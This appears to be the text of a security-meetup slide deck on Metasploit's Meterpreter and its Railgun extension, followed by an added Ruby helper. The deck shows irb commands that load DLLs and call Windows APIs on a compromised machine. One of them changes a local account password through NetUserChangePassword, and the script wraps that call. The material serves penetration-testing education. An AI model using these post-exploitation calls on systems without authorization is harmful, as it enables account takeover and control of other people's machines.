A.Chaitanya Krishna
Vivek Ramachandran (SecurityTube.net)


Bharath (Kiva Cyber securities)


My friends
Agenda
   Introduction to Metasploit Framework
   Keywords
   Introduction to Metasploit
   Meterpreter
   Enhancing Meterpreter using Railgun
   Adding Railgun functions and DLLs on the fly
   Demo
Buzz Words

     Vulnerability   A weakness in a system through which the system could be compromised.

     Exploit         Code that triggers that vulnerability on the target system.

     Payload         The code that runs after successful exploitation and gives the attacker access (for example a shell).
Metasploit Framework
Widely used tool for developing exploits and testing vulnerabilities

         A buzz word in the security community

         Used for penetration testing

         IDS signature development

         Exploit development
Why choose Metasploit

  Widely accepted tool for testing vulnerabilities

  Makes complex tasks easier

  Has a rich set of modules organized in a systematic manner

  Is updated regularly

  Contains (at the time of this talk) 1000+ exploits, 200+ payloads and 500+ auxiliary modules
Meterpreter

  meterpreter >

          The default go-to payload for Windows targets

          Provides an enhanced command shell for the attacker

          Ships with a default set of core commands

          Can be extended at runtime by loading extension DLLs into memory on the victim machine

          Provides a basic post-exploitation API
Working of Meterpreter
   Getting a Meterpreter shell goes through 3 stages:

      1. The attacker sends the exploit together with the stage 1 payload (the stager).

      2. The stager connects back and receives the stage 2 payload: the Meterpreter DLL, injected into the memory of the exploited process.

      3. The Meterpreter DLL starts communicating with the attacker's handler.
Sample Scenario

   Attacker (Backtrack)        ---- sends exploit + payload ---->        Target (Windows XP)
   192.168.47.129                                                        192.168.47.128
Metasploit Railguns presentation @ tcs hyderabad
Why Railgun
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>

          Railgun is a Meterpreter (stdapi) extension that lets the attacker load any DLL on the victim machine and call its functions

          Allows arbitrary loading of DLLs

          The Windows API DLLs live in known paths (for example C:\WINDOWS\system32), so they can be loaded very easily

          Railgun gives the flexibility and power to call arbitrary functions in DLLs on the victim's machine, without writing and shipping a new Meterpreter extension for each API
Hello World DLLs

Windows is known for its rich set of DLLs

They include the DLLs shipped with Windows as well as those installed by applications

Their functions can be called on the fly from the irb shell, or defined statically in Railgun's definition files under

/opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/def
Introduction to DLLs and Functions

        Not every function is already defined and ready to call.

        We need to add our own DLLs and function definitions at runtime before calling them.

        The right function has to be called on the DLL that exports it (MessageBoxA lives in user32).

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0, "Hello Null Hyderabad, Welcome to the meet", "NullCon", "MB_OK")

Note that the uType flag is passed as the string "MB_OK": Railgun resolves Windows constant names given as strings (including combinations such as "MB_OK | MB_ICONWARNING"), whereas a bare MB_OK would be an undefined Ruby constant in irb.
Anatomy of Functions
Function name

Function return type (for example DWORD or BOOL; VOID when nothing is returned)

Array of parameters, each given as [type, name, direction]:

      In parameters are the arguments through which we pass input to the function

      Out parameters are full-fledged data pointers; the memory behind them on the target is allocated and read back entirely by Railgun, so the caller only passes the buffer size

      Inout parameters are passed in and written back the same way

A call returns a hash with the function's return value under 'return', the thread's last-error code under 'GetLastError', and one entry per out/inout parameter.
Necessity of DLLs and Functions

In the middle of a penetration test we often need to call additional APIs to support our work.

They can be added on the fly from irb, or defined statically in the definition files under

        /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/def
Adding DLLs on the fly

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.known_dll_names
=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi"]

>> unless client.railgun.known_dll_names.include? 'NullCon'
     print_status "Adding NullCon.dll"
     client.railgun.add_dll('NullCon', 'C:\WINDOWS\system32\NullCon.dll')
   else
     print_status "NullCon DLL has already been loaded.. skipping"
   end

add_dll only registers the name and path with Railgun; the DLL itself must already exist on the target at that path (upload it first with Meterpreter's upload command), because Railgun loads it there with LoadLibrary.
Adding Functions on the fly

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.add_function('netapi32', 'NetUserChangePassword', 'DWORD', [
     ["PWCHAR", "domainname", "in"],
     ["PWCHAR", "username", "in"],
     ["PWCHAR", "oldpassword", "in"],
     ["PWCHAR", "newpassword", "in"]])

=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLLFunction:0x00000006d4fa70 ... @windows_name="N... (output truncated)

>> client.railgun.netapi32.NetUserChangePassword(nil, "NullCon", "NullCon", "NullCon123")

A nil domain name is passed as a NULL pointer, so the change applies to the local machine. Check 'return' in the result hash: 0 (NERR_Success) means the password was changed; any other NET_API_STATUS value means it was not.
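The script below is an added example written for this page; it is not code from the slides or from the Metasploit project. It ties together the "Anatomy of Functions" slide and the two "on the fly" slides: the definition is checked against the type/direction pairs Railgun accepts, registered with add_function, called, and the NET_API_STATUS it returns is interpreted instead of being ignored. It assumes a live Meterpreter session bound to `client` as in the irb sessions above; outside a session only the pure helpers run. The RAILGUN_TYPES table is my transcription of what Railgun's DLLFunction accepts, so confirm it against railgun/dll_function.rb in your own install.

```ruby
# Added example (not from the slides or Metasploit). Assumes a live
# Meterpreter session bound to `client`; see the lead-in above.

# My transcription of the type/direction pairs Railgun accepts.
RAILGUN_TYPES = {
  # value types: passed in by value, or returned; never written back
  'VOID'       => %w[return],
  'BOOL'       => %w[in return],
  'DWORD'      => %w[in return],
  'WORD'       => %w[in return],
  'BYTE'       => %w[in return],
  'LPVOID'     => %w[in return],
  'HANDLE'     => %w[in return],
  'ULONG_PTR'  => %w[in return],
  # pointer types: for "out"/"inout" Railgun allocates the buffer on the target
  # and reads it back; the caller passes only the buffer size (or initial value)
  'PDWORD'     => %w[in out inout],
  'PWCHAR'     => %w[in out inout],
  'PCHAR'      => %w[in out inout],
  'PBLOB'      => %w[in out inout],
  'PULONG_PTR' => %w[in out inout]
}.freeze

# NetUserChangePassword exactly as on the slide: add_function takes
# [type, name, direction] triples, with the type names in upper case.
NET_USER_CHANGE_PASSWORD = [
  ['PWCHAR', 'domainname',  'in'],
  ['PWCHAR', 'username',    'in'],
  ['PWCHAR', 'oldpassword', 'in'],
  ['PWCHAR', 'newpassword', 'in']
].freeze

# NET_API_STATUS codes NetUserChangePassword commonly returns (lmerr.h and
# winerror.h). 0 is NERR_Success; anything else means the password is unchanged.
NET_STATUS = {
  0    => 'NERR_Success',
  5    => 'ERROR_ACCESS_DENIED',
  86   => 'ERROR_INVALID_PASSWORD',
  2221 => 'NERR_UserNotFound',
  2245 => 'NERR_PasswordTooShort' # also returned for other policy violations
}.freeze

# Check a definition before handing it to add_function so that a mistyped
# type ("pwchar") or an impossible direction (a DWORD as "out") fails here,
# with a readable message, instead of as an obscure error at call time.
# Returns the list of problems; an empty list means the definition is valid.
def validate_definition(return_type, params)
  problems = []
  unless RAILGUN_TYPES.fetch(return_type, []).include?('return')
    problems << "return type #{return_type.inspect} is not allowed"
  end
  params.each do |type, name, direction|
    allowed = RAILGUN_TYPES[type]
    if allowed.nil?
      problems << "#{name}: unknown type #{type.inspect}"
    elsif !allowed.include?(direction)
      problems << "#{name}: #{type} cannot be used as #{direction.inspect}"
    end
  end
  problems
end

# Register dll!name with Railgun. add_dll is needed only for DLLs Railgun does
# not already know; add_function replaces an existing definition of the same
# name, so running this twice in one session is harmless.
def ensure_function(railgun, dll, name, return_type, params)
  problems = validate_definition(return_type, params)
  raise ArgumentError, problems.join('; ') unless problems.empty?
  railgun.add_dll(dll) unless railgun.known_dll_names.include?(dll)
  railgun.add_function(dll, name, return_type, params)
end

def describe_status(code)
  NET_STATUS.fetch(code) { "unknown NET_API_STATUS #{code}" }
end

# A Railgun call returns a Hash: 'return' holds the function's return value,
# 'GetLastError' the thread's last-error code, plus one key per out/inout
# parameter (none here). A nil domain is passed as a NULL pointer, which
# NetUserChangePassword treats as the local machine.
def change_password(railgun, user, old_pw, new_pw, domain: nil)
  ensure_function(railgun, 'netapi32', 'NetUserChangePassword', 'DWORD',
                  NET_USER_CHANGE_PASSWORD)
  res = railgun.netapi32.NetUserChangePassword(domain, user, old_pw, new_pw)
  status = res['return']
  { ok: status == 0, status: status, name: describe_status(status) }
end

# Runs only inside a Meterpreter irb session, where `client` and print_status
# exist. The account name and passwords are the slide's own sample values.
if defined?(client)
  r = change_password(client.railgun, 'NullCon', 'NullCon', 'NullCon123')
  print_status "NetUserChangePassword -> #{r[:name]} (#{r[:status]})"
end
```

Newer Metasploit releases call these methods add_library and known_library_names (add_dll and known_dll_names remain as the older names); the names above are the ones the slides use. The same [type, name, direction] triples, with the DLL's add_function call, are what a static definition file under railgun/def contains, so a definition validated this way can be moved there once it is stable.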
That's all

client.railgun.user32.MessageBoxA(0, "That's what's in my slides to show", "NullCon", "MB_OK")

                                                                                                Chaitanyapentest@gmail.com
